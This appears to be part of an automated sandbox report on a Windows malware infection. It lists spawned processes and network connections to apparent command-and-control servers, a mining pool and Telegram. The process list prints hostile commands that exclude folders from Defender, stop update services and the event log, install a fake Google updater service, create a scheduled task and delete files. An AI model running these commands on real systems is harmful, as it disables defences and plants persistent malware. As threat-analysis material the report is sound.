wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\ProgramData\axaso\bkujn.exe

C:\ProgramData\axaso\bkujn.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 8092 -ip 8092

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8092 -s 440

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\ProgramData\axaso\bkujn.exe

"C:\ProgramData\axaso\bkujn.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe

"C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1136

C:\Users\Admin\AppData\Local\Temp\Files\server.exe

"C:\Users\Admin\AppData\Local\Temp\Files\server.exe"

C:\Users\Admin\AppData\Local\Temp\Files\injector.exe

"C:\Users\Admin\AppData\Local\Temp\Files\injector.exe"

\??\c:\users\admin\appdata\local\temp\files\injector.exe 

c:\users\admin\appdata\local\temp\files\injector.exe 

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1216

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 508

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe PR

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe

"C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\ProgramData\axaso\bkujn.exe

C:\ProgramData\axaso\bkujn.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\ProgramData\axaso\bkujn.exe

"C:\ProgramData\axaso\bkujn.exe"

C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe

"C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6184 -ip 6184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 440

C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"

C:\Users\Admin\AppData\Local\Temp\Files\shell.exe

"C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\BtnoWSiF.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6884 -ip 6884

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BtnoWSiF" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFF27.tmp"

C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe"

C:\Users\Admin\AppData\Local\Temp\is-NUNUV.tmp\ubi-inst.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NUNUV.tmp\ubi-inst.tmp" /SL5="$60412,922170,832512,C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6264 -ip 6264

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\ProgramData\axaso\bkujn.exe

C:\ProgramData\axaso\bkujn.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1336

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 308

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6884 -ip 6884

C:\ProgramData\axaso\bkujn.exe

"C:\ProgramData\axaso\bkujn.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5836 -ip 5836

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-IADQN.tmp\set.bat""

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 440

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1432

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\ProgramData\hwnab\wjnasib.exe

C:\ProgramData\hwnab\wjnasib.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5696 -ip 5696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 444

C:\ProgramData\hwnab\wjnasib.exe

"C:\ProgramData\hwnab\wjnasib.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 1340

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe

C:\ProgramData\hwnab\wjnasib.exe

C:\ProgramData\hwnab\wjnasib.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 6884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6556 -ip 6556

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 448

C:\ProgramData\hwnab\wjnasib.exe

"C:\ProgramData\hwnab\wjnasib.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2672 -ip 2672

C:\Windows\System32\Wbem\wmic.exe

wmic csproduct get UUID

C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe

"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 1300

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 134.130.81.91.in-addr.arpa udp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
RU 31.41.244.9:80 31.41.244.9 tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.244.41.31.in-addr.arpa udp
CN 222.186.172.42:1000 tcp
NL 89.110.69.103:80 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
US 8.8.8.8:53 33.177.156.94.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
DE 212.113.107.84:80 212.113.107.84 tcp
NL 89.110.69.103:80 tcp
US 8.8.8.8:53 84.107.113.212.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
BG 195.230.23.72:8085 195.230.23.72 tcp
US 8.8.8.8:53 home.sevkk17sr.top udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 AcDyjGxADzSolWB.AcDyjGxADzSolWB udp
US 8.8.8.8:53 72.23.230.195.in-addr.arpa udp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 infect-crackle.cyou udp
US 104.21.45.165:443 infect-crackle.cyou tcp
US 8.8.8.8:53 cdn-downloads.com udp
NL 203.161.45.11:443 cdn-downloads.com tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 165.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 11.45.161.203.in-addr.arpa udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 covery-mover.biz udp
US 34.117.59.81:443 ipinfo.io tcp
US 104.21.58.186:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 api.telegram.org udp
US 8.8.8.8:53 print-vexer.biz udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.123.95.227:443 steamcommunity.com tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 186.58.21.104.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 227.95.123.104.in-addr.arpa udp
US 104.21.45.165:443 infect-crackle.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 104.21.58.186:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
GB 104.123.95.227:443 steamcommunity.com tcp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 141.94.96.195:3333 pool.supportxmr.com tcp
US 8.8.8.8:53 195.96.94.141.in-addr.arpa udp
US 8.8.8.8:53 grupodulcemar.pe udp
PE 161.132.57.101:443 grupodulcemar.pe tcp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
US 144.172.71.105:1338 144.172.71.105 tcp
US 8.8.8.8:53 105.71.172.144.in-addr.arpa udp
CN 183.57.21.131:8095 tcp
US 144.172.71.105:1338 144.172.71.105 tcp
BG 195.230.23.72:80 tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 209.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 GDinpHlLXN.GDinpHlLXN udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 twizthash.net udp
RU 185.215.113.66:80 twizthash.net tcp
US 8.8.8.8:53 download.innovare.no udp
NO 217.149.124.92:80 download.innovare.no tcp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
TR 163.5.242.208:80 163.5.242.208 tcp
US 8.8.8.8:53 92.124.149.217.in-addr.arpa udp
US 8.8.8.8:53 twizt.net udp
RU 185.215.113.66:80 twizt.net tcp
US 8.8.8.8:53 208.242.5.163.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 berrylinyj.cyou udp
US 8.8.8.8:53 worddosofrm.shop udp
US 8.8.8.8:53 mutterissuen.shop udp
US 8.8.8.8:53 standartedby.shop udp
US 8.8.8.8:53 nightybinybz.shop udp
US 8.8.8.8:53 conceszustyb.shop udp
US 8.8.8.8:53 bakedstusteeb.shop udp
US 8.8.8.8:53 respectabosiz.shop udp
US 8.8.8.8:53 moutheventushz.shop udp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
US 8.8.8.8:53 254.238.217.23.in-addr.arpa udp
US 192.210.150.26:8787 tcp
RU 185.215.113.66:80 twizt.net tcp
RU 185.215.113.66:80 twizt.net tcp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.66:80 twizt.net tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 84.113.215.185.in-addr.arpa udp
RU 185.215.113.66:80 twizt.net tcp
US 192.210.150.26:8787 tcp
BG 195.230.23.72:80 tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.66:80 twizt.net tcp
US 192.210.150.26:8787 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
RU 185.215.113.66:5152 twizt.net tcp
US 8.8.8.8:53 141.233.202.91.in-addr.arpa udp
US 192.210.150.26:8787 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 arteflordeliz.com.br udp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.72.235.82:80 www.update.microsoft.com tcp
US 108.179.252.235:80 arteflordeliz.com.br tcp
US 8.8.8.8:53 82.235.72.20.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 235.252.179.108.in-addr.arpa udp
RU 31.41.244.9:80 31.41.244.9 tcp
YE 134.35.107.95:40500 udp
UZ 90.156.164.103:40500 tcp
US 192.210.150.26:8787 tcp
UZ 217.30.160.219:40500 udp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
KZ 2.133.136.145:40500 udp
US 192.210.150.26:8787 tcp
IR 151.241.234.162:40500 udp
US 192.210.150.26:8787 tcp
UZ 90.156.163.98:40500 udp
US 192.210.150.26:8787 tcp
BG 195.230.23.72:80 tcp
IR 93.119.67.90:40500 udp
TR 85.103.235.188:40500 tcp
US 192.210.150.26:8787 tcp
KZ 213.211.105.70:40500 udp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
SY 95.212.120.220:40500 udp
NL 89.110.69.103:80 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
US 192.210.150.26:8787 tcp
NL 89.110.69.103:80 tcp
IR 89.219.192.32:40500 udp
US 192.210.150.26:8787 tcp
KZ 31.171.187.236:40500 udp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
KZ 82.200.169.186:40500 udp
TJ 91.231.253.155:40500 tcp
US 192.210.150.26:8787 tcp
IR 217.218.8.134:40500 udp
CN 47.115.54.19:80 tcp
US 8.8.8.8:53 home.tventjo20vs.top udp
US 192.210.150.26:8787 tcp
IR 2.176.94.43:40500 udp
US 192.210.150.26:8787 tcp
CN 219.159.184.14:40500 udp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
GT 190.56.14.82:40500 udp
BG 195.230.23.72:80 tcp
US 192.210.150.26:8787 tcp
MX 189.142.102.173:40500 udp
US 192.210.150.26:8787 tcp
US 198.163.193.229:40500 tcp
TR 85.103.235.188:40500 udp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
AO 102.215.170.62:40500 udp
CN 47.116.27.92:8081 tcp
US 8.8.8.8:53 300snails.sbs udp
US 8.8.8.8:53 thicktoys.sbs udp
US 8.8.8.8:53 fleez-inc.sbs udp
US 8.8.8.8:53 3xc1aimbl0w.sbs udp
US 8.8.8.8:53 bored-light.sbs udp
US 8.8.8.8:53 faintbl0w.sbs udp
US 8.8.8.8:53 crib-endanger.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 192.210.150.26:8787 tcp
KZ 5.251.234.88:40500 udp
UZ 213.230.126.169:40500 udp
US 192.210.150.26:8787 tcp
UZ 93.188.83.239:40500 udp
US 192.210.150.26:8787 tcp
IR 2.190.224.152:40500 tcp
UZ 90.156.160.10:40500 udp
US 8.8.8.8:53 dev.cyberark-igiwax.com udp
US 44.243.209.238:80 dev.cyberark-igiwax.com tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 198.163.196.30:40500 udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 drive-connect.cyou udp
US 172.67.139.78:443 drive-connect.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 104.21.58.186:443 covery-mover.biz tcp
US 192.210.150.26:8787 tcp
KR 211.204.100.20:1234 211.204.100.20 tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
RU 31.41.244.10:80 31.41.244.10 tcp
UZ 90.156.161.73:40500 udp
US 192.210.150.26:8787 tcp
BG 195.230.23.72:80 tcp
US 192.210.150.26:8787 tcp
KZ 5.251.95.166:40500 udp
US 192.210.150.26:8787 tcp
IR 2.185.189.167:40500 udp
CN 183.57.21.131:8095 tcp
US 192.210.150.26:8787 tcp
RU 178.206.158.183:40500 tcp
IR 5.134.199.85:40500 udp
US 192.210.150.26:8787 tcp
KZ 37.151.133.175:40500 udp
US 192.210.150.26:8787 tcp
IR 2.181.206.190:40500 udp
US 192.210.150.26:8787 tcp
IR 77.81.135.219:40500 udp
US 192.210.150.26:8787 tcp
KR 146.56.118.137:80 146.56.118.137 tcp
US 192.210.150.26:8787 tcp
MX 201.114.202.249:40500 udp
US 8.8.8.8:53 d.kpzip.com udp
CN 14.205.47.205:80 d.kpzip.com tcp
US 192.210.150.26:8787 tcp
CI 160.155.209.135:40500 udp
YE 178.130.96.97:40500 tcp
US 192.210.150.26:8787 tcp
AF 149.54.20.134:40500 udp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
IR 151.241.114.78:40500 udp
BG 195.230.23.72:80 tcp
US 192.210.150.26:8787 tcp
US 198.163.193.229:40500 udp
GB 20.26.156.215:443 github.com tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 ftp.ywxww.net udp
CN 60.191.208.187:820 ftp.ywxww.net tcp
